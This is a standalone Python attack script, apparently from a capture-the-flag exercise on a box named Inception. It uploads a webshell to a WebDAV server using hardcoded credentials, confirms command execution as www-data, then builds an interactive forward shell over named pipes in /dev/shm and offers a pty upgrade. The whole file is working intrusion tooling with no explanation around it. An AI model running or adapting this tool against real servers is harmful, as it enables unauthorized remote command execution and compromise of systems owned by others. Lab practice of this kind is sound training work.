#!/usr/bin/env python3 import random import requests import sys from cmd import Cmd class Term(Cmd): prompt = "Inception> " def __init__(self): super().__init__() self.url_base = "" self.id = random.randrange(10000, 99999) self.url = f"{self.url_base}0xdf-{self.id}.php" self.auth = ("webdav_tester", "babygurl69") self.input = f"/dev/shm/stdin.{self.id}" self.output = f"/dev/shm/stdout.{self.id}" print(f"Starting forward shell with session {self.id}") # upload webshell requests.put(self.url, auth=self.auth, data="") resp = requests.post(self.url, data={"cmd": "id"}, auth=self.auth) assert "uid=33(www-data) gid=33(www-data) groups=33(www-data)" in resp.text print(f"Webshell uploaded to {self.url}") # init forward shell self.raw_command(f"mkfifo {self.input}") self.raw_command(f"tail -f {self.input} | /bin/sh 2>&1 > {self.output}", timeout=0.5) print("Forward shell initiated") def raw_command(self, command, timeout=None): try: resp = requests.post(self.url, data={"cmd": command}, auth=self.auth, timeout=timeout) except requests.exceptions.ReadTimeout: return None return resp.text def command(self, command, timeout=None): self.raw_command(f"echo {command} > {self.input}") resp = self.raw_command(f"cat {self.output}; echo -n > {self.output}") return resp def default(self, args): print(self.command(args), end="") def do_upgrade(self, args): print(self.command("script /dev/null -c bash"), end="") print(self.command("stty raw -echo"), end="") self.prompt = "" term = Term() try: sys.exit(term.cmdloop()) except KeyboardInterrupt: print()